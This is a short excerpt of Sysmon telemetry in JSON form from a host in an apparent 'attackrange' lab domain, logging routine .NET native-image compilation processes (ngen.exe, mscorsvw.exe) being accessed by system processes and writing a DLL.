{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8291,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.887\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-0010449A1300}\r\nTargetProcessId: 4216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.887","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-0010449A1300}","TargetProcessId":"4216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8292,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.887\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-0010449A1300}\r\nTargetProcessId: 4216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.887","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-0010449A1300}","TargetProcessId":"4216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8293,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-0010449A1300}\r\nTargetProcessId: 4216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-0010449A1300}","TargetProcessId":"4216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8294,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:07.122\r\nProcessGuid: {A837DB8D-0522-5F25-0000-0010449A1300}\r\nProcessId: 4216\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1078-0\\System.Xml.Linq.dll\r\nCreationUtcTime: 2020-08-01 06:01:07.122","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:07.122","ProcessGuid":"{A837DB8D-0522-5F25-0000-0010449A1300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1078-0\\System.Xml.Linq.dll","CreationUtcTime":"2020-08-01 06:01:07.122","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8295,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.169\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-0010DD3A1300}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.169","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-0010DD3A1300}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8296,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.169\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-0010DD3A1300}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.169","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-0010DD3A1300}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8297,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.169\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-0010DD3A1300}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.169","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-0010DD3A1300}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8298,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.372\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0523-5F25-0000-0010FCA11300}\r\nTargetProcessId: 1200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.372","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0523-5F25-0000-0010FCA11300}","TargetProcessId":"1200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
